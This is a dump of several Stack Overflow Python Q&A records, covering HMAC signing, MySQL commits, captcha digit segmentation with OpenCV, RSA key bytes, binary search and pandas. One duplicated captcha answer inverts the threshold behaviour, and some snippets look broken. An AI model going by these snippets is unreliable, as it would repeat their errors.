[ "Found the issue, i was trying to digest with out digestmod\nWorking Example:\n sign = hmac.new(\n app_secret.encode(),\n sign_string.encode(),\n digestmod = hashlib.sha256\n ).hexdigest()\n\n" ]
[ 0 ]
[]
[]
[ "hash", "python", "python_3.x", "sign" ]
stackoverflow_0074592357_hash_python_python_3.x_sign.txt
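For completeness, a fuller port of the Go function using the sample values from the question (path /api/orders, app_key 12345, timestamp 1623812664, app_secret 777); whether the resulting hex digest is accepted by the remote API cannot be verified here:

import hashlib
import hmac

def generate_sha256(path, queries, secret):
    # path + sorted key/value pairs, wrapped in the secret on both sides,
    # then HMAC-SHA256 keyed with the secret -- mirrors the Go version
    payload = path + "".join(k + queries[k] for k in sorted(queries))
    payload = secret + payload + secret
    return hmac.new(secret.encode(), payload.encode(),
                    digestmod=hashlib.sha256).hexdigest()

print(generate_sha256("/api/orders",
                      {"app_key": "12345", "timestamp": "1623812664"},
                      "777"))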
Q: how to UPDATE SQL database dynamically using python? import mysql.connector db = mysql.connector.connect(host="localhost", user="1234", passwd="1234", database="books1") mycursor = db.cursor() label = '202' position = 'A1' sql2 = """INSERT INTO info (label, position) VALUES (%s, %s)""" db2 = (label, position) mycursor.execute(sql2, db2) print("Updated") When I run the code it says updated, but whenever I check and refresh my sql database the old table appears. How do I update my latest input data here? A: You have to commit the transaction. Add db.commit() after mycursor.execute()
how to UPDATE SQL database dynamically using python?
import mysql.connector db = mysql.connector.connect(host="localhost", user="1234", passwd="1234", database="books1") mycursor = db.cursor() label = '202' position = 'A1' sql2 = """INSERT INTO info (label, position) VALUES (%s, %s)""" db2 = (label, position) mycursor.execute(sql2, db2) print("Updated") When I run the code it says updated, but whenever I check and refresh my sql database the old table appears. How do I update my latest input data here?
[ "You have to commit the transaction.\nAdd db.commit() after mycursor.execute()\n" ]
[ 2 ]
[]
[]
[ "python", "sql" ]
stackoverflow_0074592976_python_sql.txt
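The question's snippet with the missing commit added, kept otherwise identical (credentials and table come from the question and are assumed to exist):

import mysql.connector

db = mysql.connector.connect(host="localhost", user="1234",
                             passwd="1234", database="books1")
mycursor = db.cursor()

sql2 = """INSERT INTO info (label, position) VALUES (%s, %s)"""
mycursor.execute(sql2, ("202", "A1"))
db.commit()   # persist the INSERT; without this it is rolled back on close
print(mycursor.rowcount, "row inserted")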
Q: how to get captcha numbers separately using python I have this specific 3-digit captcha, like: I am trying to slice the 3 digits, I tried to use pytesseract module to recognize text in images but it's not so accurate. So I researched about it and found out that I could make the background completely white so that I could crop all the extra space from the picture, and dividing the picture to 3 pieces would most likely happen to be what I need, so I'm looking for a way to implement this filter and crop it and slicing it into three pieces I found out PIL module can help me import the image on python from PIL import Image im = Image.open("captcha.jpg") and I'm looking for a way which I can make the background totally white and crop the extra spaces and divide the picture into three pieces, thanks for your guidance in advance. A: so I have found this library called cv2 with this method called threshold For every pixel, the same threshold value is applied. If the pixel value is smaller than the threshold, it is set to 0, otherwise it is set to a maximum value. img = cv.imread('gradient.png',0) ret,thresh1 = cv.threshold(img,127,255,cv.THRESH_BINARY) in the example above it takes an image and if the pixel is below 127 it makes it completely black, otherwise it's going to be completely white. further reading: https://docs.opencv.org/4.x/d7/d4d/tutorial_py_thresholding.html
how to get captcha numbers separately using python
I have this specific 3-digit captcha, like: I am trying to slice the 3 digits, I tried to use pytesseract module to recognize text in images but it's not so accurate. So I researched about it and found out that I could make the background completely white so that I could crop all the extra space from the picture, and dividing the picture to 3 pieces would most likely happen to be what I need, so I'm looking for a way to implement this filter and crop it and slicing it into three pieces I found out PIL module can help me import the image on python from PIL import Image im = Image.open("captcha.jpg") and I'm looking for a way which I can make the background totally white and crop the extra spaces and divide the picture into three pieces, thanks for your guidance in advance.
[ "so I have found this library called cv2 with this method called threshold\nFor every pixel, the same threshold value is applied. If the pixel value is smaller than the threshold, it is set to 0, otherwise it is set to a maximum value.\nimg = cv.imread('gradient.png',0)\nret,thresh1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\n\nin the example above it takes an image and if the pixel is below 127 it makes it completely white, otherwise it's going to be completely black.\nfurther reading:\nhttps://docs.opencv.org/4.x/d7/d4d/tutorial_py_thresholding.html\n" ]
[ 0 ]
[]
[]
[ "captcha", "python", "text_recognition" ]
stackoverflow_0074592679_captcha_python_text_recognition.txt
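An end-to-end sketch of the plan described in the question: threshold, crop to the ink, then cut into three equal strips. It assumes dark digits on a light background and roughly equal digit widths, which may not hold for every captcha:

import cv2

img = cv2.imread("captcha.jpg", cv2.IMREAD_GRAYSCALE)
_, bw = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)  # dark -> 0, light -> 255

# crop to the bounding box of the remaining dark (digit) pixels
ys, xs = (bw == 0).nonzero()
cropped = bw[ys.min():ys.max() + 1, xs.min():xs.max() + 1]

# slice the cropped strip into three equal-width pieces, one per digit
w = cropped.shape[1] // 3
for i in range(3):
    cv2.imwrite(f"digit_{i}.png", cropped[:, i * w:(i + 1) * w])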
Q: How to take out the quotation marks(start & end) and convert into bytes - Python 3.7.9 I'm receiving from an input this, "b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'" and i'm struggling to make it become a bytes, and not string, and be able to load the keys without problems - ValueError: No PEM start marker "b'-----BEGIN RSA PUBLIC KEY-----'" found. Changing to bytes using the b'', tried replacing it, tried using the strip(). etc A: Python 3.9+ : You have .removesuffix() and .removeprefix() options. In lower versions, You can simply slice the string from character two, until before the last one. Then you can use .encode() to convert your string to byte: old_string = "b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'" new_string1 = old_string.removeprefix("b'").removesuffix("'").encode("ASCII") new_string2 = old_string[2:-1].encode("ASCII") print(type(old_string), old_string) print(type(new_string1), new_string1) print(type(new_string2), new_string2) output: <class 'str'> b'-----BEGIN RSA PUBLIC KEY-----\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\n-----END RSA PUBLIC KEY-----\n' <class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n' <class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n' By default .encode() uses "UTF-8" but since your dealing with ASCII characters it won't cause problem. You can pass "ASCII" if you want.
How to take out the quotation marks(start & end) and convert into bytes - Python 3.7.9
I'm receiving from an input this, "b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'" and i'm struggling to make it become a bytes, and not string, and be able to load the keys without problems - ValueError: No PEM start marker "b'-----BEGIN RSA PUBLIC KEY-----'" found. Changing to bytes using the b'', tried replacing it, tried using the strip(). etc
[ "Python 3.9+ : You have .removesuffix() and .removeprefix() options.\nIn lower versions, You can simply slice the string from character two, until before the last one.\nThen you can use .encode() to convert your string to byte:\nold_string = \"b'-----BEGIN RSA PUBLIC KEY-----\\\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\\\n-----END RSA PUBLIC KEY-----\\\\n'\"\nnew_string1 = old_string.removeprefix(\"b'\").removesuffix(\"'\").encode(\"ASCII\")\nnew_string2 = old_string[2:-1].encode(\"ASCII\")\n\nprint(type(old_string), old_string)\nprint(type(new_string1), new_string1)\nprint(type(new_string2), new_string2)\n\noutput:\n<class 'str'> b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'\n<class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\\\n-----END RSA PUBLIC KEY-----\\\\n'\n<class 'bytes'> b'-----BEGIN RSA PUBLIC KEY-----\\\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\\\n-----END RSA PUBLIC KEY-----\\\\n'\n\nBy default .encode() uses \"UTF-8\" but since your dealing with ASCII characters it won't cause problem. You can pass \"ASCII\" if you want.\n" ]
[ 1 ]
[]
[]
[ "python", "python_3.7" ]
stackoverflow_0074593012_python_python_3.7.txt
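One caveat the answer glosses over: slicing keeps the two-character \n sequences as literal backslashes, which PEM parsers reject. When the input is the repr of a bytes object, as here, ast.literal_eval turns those escapes back into real newlines; a small sketch:

import ast

raw = "b'-----BEGIN RSA PUBLIC KEY-----\\nMBgCEQCZ0e8OKi/eLXMXxPrhdFc3AgMBAAE=\\n-----END RSA PUBLIC KEY-----\\n'"

key_bytes = ast.literal_eval(raw)   # parses the b'...' literal, decoding the \n escapes
print(type(key_bytes))              # <class 'bytes'>
print(key_bytes.splitlines()[0])    # b'-----BEGIN RSA PUBLIC KEY-----'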
Q: I am trying to implement binary search but I don't know what's wrong with my code? This is a binary search algorithm that is showing output as None. I don't know why. And if you know any free course to learn data structures and algorithms in python, please let me know. import random def binary_search(list,target): start_index=0 end_index=len(list)-1 while start_index<=end_index: midpoint=(start_index+end_index)//2 midpoint_value=list[midpoint] if midpoint_value==target: return midpoint+1 elif midpoint_value<target: end_index=midpoint-1 else: start_index=midpoint+1 print(binary_search([1,2,3,4,5,6,7,8],8)) 8 on 7th index position A: You're using < wrong. It should be > def binary_search(list, target): start_index = 0 end_index = len(list)-1 while start_index <= end_index: midpoint = (start_index+end_index)//2 midpoint_value = list[midpoint] if midpoint_value == target: return midpoint+1 elif midpoint_value > target: end_index = midpoint-1 else: start_index = midpoint+1 print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8)) More appropriate approach will be to return True/False to compare later def binary_search(list, target): start_index = 0 end_index = len(list)-1 while start_index <= end_index: midpoint = (start_index+end_index)//2 midpoint_value = list[midpoint] if midpoint_value == target: return True elif midpoint_value > target: end_index = midpoint-1 else: start_index = midpoint+1 return False print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8)) Binary Search reference. G4G is a great resource for learning. A: Refer Below links to learn Python Program for Binary Search w3resource javatpoint geeksforgeeks def binary_search(list, target): start_index = 0 end_index = len(list)-1 while start_index <= end_index: midpoint = (start_index+end_index)//2 midpoint_value = list[midpoint] if midpoint_value == target: return True elif midpoint_value > target: end_index = midpoint-1 else: start_index = midpoint+1 return False print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))
I am trying to implement binary search but I don't know what's wrong with my code?
This is a binary search algorithm that is showing output as None. I don't know why. And if you know any free course to learn data structures and algorithms in python, please let me know. import random def binary_search(list,target): start_index=0 end_index=len(list)-1 while start_index<=end_index: midpoint=(start_index+end_index)//2 midpoint_value=list[midpoint] if midpoint_value==target: return midpoint+1 elif midpoint_value<target: end_index=midpoint-1 else: start_index=midpoint+1 print(binary_search([1,2,3,4,5,6,7,8],8)) 8 on 7th index position
[ "You're using < wrong. It should be >\ndef binary_search(list, target):\n start_index = 0\n end_index = len(list)-1\n while start_index <= end_index:\n midpoint = (start_index+end_index)//2\n midpoint_value = list[midpoint]\n if midpoint_value == target:\n return midpoint+1\n elif midpoint_value > target:\n end_index = midpoint-1\n else:\n start_index = midpoint+1\n\nprint(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))\n\n\nMore appropriate approach will be to return True/False to compare later\ndef binary_search(list, target):\n start_index = 0\n end_index = len(list)-1\n while start_index <= end_index:\n midpoint = (start_index+end_index)//2\n midpoint_value = list[midpoint]\n if midpoint_value == target:\n return True\n elif midpoint_value > target:\n end_index = midpoint-1\n else:\n start_index = midpoint+1\n return False\n\nprint(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))\n\nBinary Search reference.\nG4G is a great resource for learning.\n", "Refer Below links to learn Python Program for Binary Search\nw3resource javatpoint geeksforgeeks\ndef binary_search(list, target):\n start_index = 0\n end_index = len(list)-1\n while start_index <= end_index:\n midpoint = (start_index+end_index)//2\n midpoint_value = list[midpoint]\n if midpoint_value == target:\n return True\n elif midpoint_value > target:\n end_index = midpoint-1\n else:\n start_index = midpoint+1\n return False\n\nprint(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))\n\n" ]
[ 0, 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592392_python.txt
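The standard library already ships this algorithm; a hedged alternative to the hand-rolled loop using bisect, which returns True/False like the second fix above:

from bisect import bisect_left

def binary_search(items, target):
    i = bisect_left(items, target)   # leftmost index where target would insert
    return i < len(items) and items[i] == target

print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 8))  # True
print(binary_search([1, 2, 3, 4, 5, 6, 7, 8], 9))  # False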
Q: How to choose one smallest values among multiple duplicates values in a data frame? Sample Data: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Sample Code 1 WATT1 = WATTx.loc[WATTx['Fitness Value'].eq(df['Fitness Value'].min())] WATT1 Sample Code 2 WATTy = WATTx .loc[WATTx ['Fitness Value'].idxmin()] WATTy Output: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Since all values are the same. In the output, it prints all the values. That's the issue. I want to print one smallest value among these duplicate values. Is it possible? #Screenshot 1 #Screenshot 2 Full Error Track --------------------------------------------------------------------------- ValueError Traceback (most recent call last) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:391, in RangeIndex.get_loc(self, key, method, tolerance) 390 try: --> 391 return self._range.index(new_key) 392 except ValueError as err: ValueError: 13 is not in range The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) Input In [59], in <cell line: 1>() ----> 1 WATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()] 2 display (WATTy) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1073, in _LocationIndexer.__getitem__(self, key) 1070 axis = self.axis or 0 1072 maybe_callable = com.apply_if_callable(key, self.obj) -> 1073 return self._getitem_axis(maybe_callable, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1312, in _LocIndexer._getitem_axis(self, key, axis) 1310 # fall thru to straight lookup 1311 self._validate_key(key, axis) -> 1312 return self._get_label(key, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1260, in _LocIndexer._get_label(self, label, axis) 1258 def _get_label(self, label, axis: int): 1259 # GH#5567 this will fail if the label is not present in the axis. -> 1260 return self.obj.xs(label, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/generic.py:4056, in NDFrame.xs(self, key, axis, level, drop_level) 4054 new_index = index[loc] 4055 else: -> 4056 loc = index.get_loc(key) 4058 if isinstance(loc, np.ndarray): 4059 if loc.dtype == np.bool_: File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:393, in RangeIndex.get_loc(self, key, method, tolerance) 391 return self._range.index(new_key) 392 except ValueError as err: --> 393 raise KeyError(key) from err 394 self._check_indexing_error(key) 395 raise KeyError(key) KeyError: 13 A: I suppose that your dataframe WATTx has a non unique index values. Try to reset_index before using boolean indexing with idxmin : WATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()] # Output : print(WATTy) idx 1 Fitness Value 1.045426 MSU Locations {13,38,15} MSU Range 2.213424 Name: 1, dtype: object
How to choose one smallest values among multiple duplicates values in a data frame?
Sample Data: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Sample Code 1 WATT1 = WATTx.loc[WATTx['Fitness Value'].eq(df['Fitness Value'].min())] WATT1 Sample Code 2 WATTy = WATTx .loc[WATTx ['Fitness Value'].idxmin()] WATTy Output: Fitness Value MSU Locations MSU Range 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 13 1.045426 {13, 38, 15} 2.213424 Since all values are the same. In the output, it prints all the values. That's the issue. I want to print one smallest value among these duplicate values. Is it possible? #Screenshot 1 #Screenshot 2 Full Error Track --------------------------------------------------------------------------- ValueError Traceback (most recent call last) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:391, in RangeIndex.get_loc(self, key, method, tolerance) 390 try: --> 391 return self._range.index(new_key) 392 except ValueError as err: ValueError: 13 is not in range The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) Input In [59], in <cell line: 1>() ----> 1 WATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()] 2 display (WATTy) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1073, in _LocationIndexer.__getitem__(self, key) 1070 axis = self.axis or 0 1072 maybe_callable = com.apply_if_callable(key, self.obj) -> 1073 return self._getitem_axis(maybe_callable, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1312, in _LocIndexer._getitem_axis(self, key, axis) 1310 # fall thru to straight lookup 1311 self._validate_key(key, axis) -> 1312 return self._get_label(key, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexing.py:1260, in _LocIndexer._get_label(self, label, axis) 1258 def _get_label(self, label, axis: int): 1259 # GH#5567 this will fail if the label is not present in the axis. -> 1260 return self.obj.xs(label, axis=axis) File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/generic.py:4056, in NDFrame.xs(self, key, axis, level, drop_level) 4054 new_index = index[loc] 4055 else: -> 4056 loc = index.get_loc(key) 4058 if isinstance(loc, np.ndarray): 4059 if loc.dtype == np.bool_: File ~/opt/anaconda3/envs/geo_env/lib/python3.10/site-packages/pandas/core/indexes/range.py:393, in RangeIndex.get_loc(self, key, method, tolerance) 391 return self._range.index(new_key) 392 except ValueError as err: --> 393 raise KeyError(key) from err 394 self._check_indexing_error(key) 395 raise KeyError(key) KeyError: 13
[ "I suppose that your dataframe WATTx has a non unique index values.\nTry to reset_index before using boolean indexing with idxmin :\nWATTy= WATTx.reset_index().loc[WATTx['Fitness Value'].idxmin()]\n\n# Output :\nprint(WATTy)\n\nidx 1\nFitness Value 1.045426\nMSU Locations {13,38,15}\nMSU Range 2.213424\nName: 1, dtype: object\n\n" ]
[ 1 ]
[]
[]
[ "dataframe", "genetic_algorithm", "genetic_programming", "pandas", "python" ]
stackoverflow_0074592779_dataframe_genetic_algorithm_genetic_programming_pandas_python.txt
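For the duplicate-minimum question above, a minimal sketch of two equivalent ways to get exactly one row, using a small stand-in frame with the duplicated index from the question:

import pandas as pd

df = pd.DataFrame(
    {"Fitness Value": [1.045426, 1.045426, 1.045426],
     "MSU Range": [2.213424, 2.213424, 2.213424]},
    index=[13, 13, 13],
)

# nsmallest returns a single row even though the minimum (and the index) is duplicated
print(df.nsmallest(1, "Fitness Value"))

# equivalent route: make the index unique first, then select by the idxmin label
tmp = df.reset_index(drop=True)
print(tmp.loc[[tmp["Fitness Value"].idxmin()]])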
Q: How to convert prices in one dataframe with exchange rates in another one? I have a dataframe of amount bought like this: import pandas as pd amounts = pd.DataFrame({ 'symbol': ['EUR/USD', 'EUR/USD', 'GBP/USD', 'GBP/USD', 'EUR/GBP', 'EUR/GBP'], 'time': [1, 2, 1, 2, 1, 2], 'amount': [1, 1, 2, 2, 3, 3] }) amounts.set_index('symbol', inplace=True) prices = pd.DataFrame({ 'symbol': ['EUR/USD', 'GBP/USD', 'EUR/GBP'], 'price': [1.2, 1.5, 0.8] }) prices.set_index('symbol', inplace=True) amounts = amounts.join(prices, on='symbol') amounts['eur'] = 0 amounts['eur'] = amounts['eur'].mask( amounts.index.str.split('/').str[0] == 'EUR', amounts['amount'] / amounts['price']) amounts['eur'] = amounts['eur'].mask( amounts.index.str.split('/').str[1] == 'EUR', amounts['amount'] * amounts['price']) amounts['eur'] = amounts['eur'].mask( (amounts['eur'] == 0) & (f'EUR/' + amounts.index.str.split('/').str[1]).isin(prices.index), amounts['amount'] * amounts['price'] * prices[f'EUR/' + amounts.index.str.split('/').str[1]]) The final output should be amounts['eur'] = [ 0.83, # amount / price(EUR/USD) = 1 / 1.2 0.83, # amount / price(EUR/USD) = 1 / 1.2 2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2 2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2 3.75, # amount / price(EUR/GBP) = 3 / 0.8 3.75 # amount / price(EUR/GBP) = 3 / 0.8 ] Everytime I try to have EUR as the denominator. The last line raise an error unfortunately. I would like to get the amount in EUr denomination. Also, as I have millions of lines, I would like to avoid foor loops. Any idea please? A: Here is one way to do it with Pandas merge method: # Setup amounts = amounts.set_index("symbol") # Convert all prices in EUR prices["price_eur"] = prices["price"] prices.loc[prices["symbol"] == "GBP/USD", "price_eur"] = ( prices.loc[prices["symbol"] == "EUR/USD", "price"].values[0] / prices.loc[prices["symbol"] == "GBP/USD", "price"].values[0] ) prices = prices.set_index("symbol") # Add new column "eur" amounts = ( pd.merge(right=amounts, left=prices, how="right", right_index=True, left_index=True) .pipe(lambda df_: df_.assign(eur=df_["amount"] / df_["price_eur"])) .drop(columns="price_eur") ) Then: price time amount eur symbol EUR/GBP 0.8 1 3 3.750000 EUR/GBP 0.8 2 3 3.750000 EUR/USD 1.2 1 1 0.833333 EUR/USD 1.2 2 1 0.833333 GBP/USD 1.5 1 2 2.500000 GBP/USD 1.5 2 2 2.500000
How to convert prices in one dataframe with exchange rates in another one?
I have a dataframe of amount bought like this:
import pandas as pd

amounts = pd.DataFrame({
    'symbol': ['EUR/USD', 'EUR/USD', 'GBP/USD', 'GBP/USD', 'EUR/GBP', 'EUR/GBP'],
    'time': [1, 2, 1, 2, 1, 2],
    'amount': [1, 1, 2, 2, 3, 3]
})
amounts.set_index('symbol', inplace=True)

prices = pd.DataFrame({
    'symbol': ['EUR/USD', 'GBP/USD', 'EUR/GBP'],
    'price': [1.2, 1.5, 0.8]
})
prices.set_index('symbol', inplace=True)

amounts = amounts.join(prices, on='symbol')
amounts['eur'] = 0
amounts['eur'] = amounts['eur'].mask(
    amounts.index.str.split('/').str[0] == 'EUR',
    amounts['amount'] / amounts['price'])
amounts['eur'] = amounts['eur'].mask(
    amounts.index.str.split('/').str[1] == 'EUR',
    amounts['amount'] * amounts['price'])
amounts['eur'] = amounts['eur'].mask(
    (amounts['eur'] == 0) & (f'EUR/' + amounts.index.str.split('/').str[1]).isin(prices.index),
    amounts['amount'] * amounts['price'] * prices[f'EUR/' + amounts.index.str.split('/').str[1]])

The final output should be
amounts['eur'] = [
    0.83, # amount / price(EUR/USD) = 1 / 1.2
    0.83, # amount / price(EUR/USD) = 1 / 1.2
    2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2
    2.5, # amount * price(GBP/USD) / price(EUR/USD) = 2 * 1.5 / 1.2
    3.75, # amount / price(EUR/GBP) = 3 / 0.8
    3.75 # amount / price(EUR/GBP) = 3 / 0.8
]

Every time, I try to have EUR as the denominator. The last line raises an error, unfortunately. I would like to get the amount in EUR denomination.
Also, as I have millions of lines, I would like to avoid for loops.
Any idea please?
[ "Here is one way to do it with Pandas merge method:\n# Setup\namounts = amounts.set_index(\"symbol\")\n\n# Convert all prices in EUR\nprices[\"price_eur\"] = prices[\"price\"]\nprices.loc[prices[\"symbol\"] == \"GBP/USD\", \"price_eur\"] = (\n prices.loc[prices[\"symbol\"] == \"EUR/USD\", \"price\"].values[0]\n / prices.loc[prices[\"symbol\"] == \"GBP/USD\", \"price\"].values[0]\n)\nprices = prices.set_index(\"symbol\")\n\n# Add new column \"eur\"\namounts = (\n pd.merge(right=amounts, left=prices, how=\"right\", right_index=True, left_index=True)\n .pipe(lambda df_: df_.assign(eur=df_[\"amount\"] / df_[\"price_eur\"]))\n .drop(columns=\"price_eur\")\n)\n\nThen:\n price time amount eur\nsymbol\nEUR/GBP 0.8 1 3 3.750000\nEUR/GBP 0.8 2 3 3.750000\nEUR/USD 1.2 1 1 0.833333\nEUR/USD 1.2 2 1 0.833333\nGBP/USD 1.5 1 2 2.500000\nGBP/USD 1.5 2 2 2.500000\n\n" ]
[ 0 ]
[]
[]
[ "pandas", "python", "python_3.x" ]
stackoverflow_0074538466_pandas_python_python_3.x.txt
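For the currency-conversion question above, a loop-free sketch of the same triangulation. It assumes, as the expected output implies, that each amount is denominated in the pair's non-EUR currency; the per-symbol rates are derived by hand from the three quotes in the question:

import pandas as pd

amounts = pd.DataFrame({
    "symbol": ["EUR/USD", "EUR/USD", "GBP/USD", "GBP/USD", "EUR/GBP", "EUR/GBP"],
    "amount": [1, 1, 2, 2, 3, 3],
})

# units of each pair's amount-currency per 1 EUR:
# USD per EUR = 1.2, GBP per EUR = 1.2 / 1.5 = 0.8
rate_per_eur = {"EUR/USD": 1.2, "GBP/USD": 1.2 / 1.5, "EUR/GBP": 0.8}

# vectorized: map each symbol to its rate, then divide once
amounts["eur"] = amounts["amount"] / amounts["symbol"].map(rate_per_eur)
print(amounts)  # eur column: 0.833, 0.833, 2.5, 2.5, 3.75, 3.75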
Q: Python - Combine text data from group of file by filename I have below list of text files , I wanted to combine group of files like below Inv030001.txt - should have all data of files starting with Inv030001 Inv030002.txt - should have all data of files starting with Inv030002 I tried below code but it's not working filenames = glob(textfile_dir+'*.txt') for fname in filenames: filename = fname.split('\\')[-1] current_invoice_number = (filename.split('_')[0]).split('.')[0] prev_invoice_number = current_invoice_number with open(textfile_dir + current_invoice_number+'.txt', 'w') as outfile: for eachfile in fnmatch.filter(os.listdir(textfile_dir), '*[!'+current_invoice_number+'].txt'): current_invoice_number = (eachfile.split('_')[0]).split('.')[0] if(current_invoice_number == prev_invoice_number): with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number else: with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number #break; A: Does this answer your question? My version will append the data from "like" invoice numbers to a .txt file named with just the invoice number. In other words, anything that starts with "Inv030001" will have it's contents appended to "Inv030001.txt". The idea being that you likely don't want to overwrite files and possibly destroy them if your write logic had a mistake. I actually recreated your files to test this. I did exactly what I suggested you do. I just treated every part as a separate task and built it up to this, and in doing that the script became far less verbose and convoluted. I labeled all of my comments with task to pound it in that this is just a series of very simple things. I also renamed your vars to what they actually are. For instance, filenames aren't filenames, at all. They are entire paths. import os from glob import glob #you'll have to change this path to yours root = os.path.join(os.getcwd(), 'texts/') #sorting this may be redundant paths = sorted(glob(root+'*.txt')) for path in paths: #task: get filename filename = path.split('\\')[-1] #task: get invoice number invnum = filename.split('_')[0] #task: open in and out files with open(f'{root}{invnum}.txt', 'a') as out_, open(path, 'r') as in_: #task: append in contents to out out_.write(in_.read()) A: Your code may have had a little too much complications in it. And so, the idea is that for every file in the directory, just add it's contents (that is, append) to the invoice file. from glob import glob, fnmatch import os textfile_dir="invs" + os.sep # # I changed this to os.sep since I'm on a MAC - hopefully works in windows, too filenames = glob(textfile_dir+'*.txt') for fname in filenames: filename = fname.split(os.sep)[-1] current_invoice_number = (filename.split('_')[0]).split('.')[0] with open(textfile_dir + current_invoice_number+'.txt', 'a') as outfile: with open(fname) as infile: for line in infile: outfile.write(line) Some room for improvement: If you created your accumulation files in a different directory, there would be less of a chance of you picking them up when you run this program again (we are using append 'a' when we open the files for writing. The order of the files is not preserved with glob (AFAIK). This may not be great for having deterministic results. 
A: Below is the working code, if someone is looking for the same solution (note the required imports and indentation):
import os
import fileinput
from glob import glob
from collections import defaultdict

filenames = glob(textfile_dir+'*.txt')
dd = defaultdict(list)
for filename in filenames:
    name, ext = os.path.splitext(filename)
    name = name.split('\\')[-1].split('_')[0]
    dd[name].append(filename)

for key, fnames in dd.items():
    with open(textfile_dir+key+'.txt', "w") as newfile:
        for line in fileinput.FileInput(fnames):
            newfile.write(line)
Python - Combine text data from group of file by filename
I have below list of text files , I wanted to combine group of files like below Inv030001.txt - should have all data of files starting with Inv030001 Inv030002.txt - should have all data of files starting with Inv030002 I tried below code but it's not working filenames = glob(textfile_dir+'*.txt') for fname in filenames: filename = fname.split('\\')[-1] current_invoice_number = (filename.split('_')[0]).split('.')[0] prev_invoice_number = current_invoice_number with open(textfile_dir + current_invoice_number+'.txt', 'w') as outfile: for eachfile in fnmatch.filter(os.listdir(textfile_dir), '*[!'+current_invoice_number+'].txt'): current_invoice_number = (eachfile.split('_')[0]).split('.')[0] if(current_invoice_number == prev_invoice_number): with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number else: with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number #break;
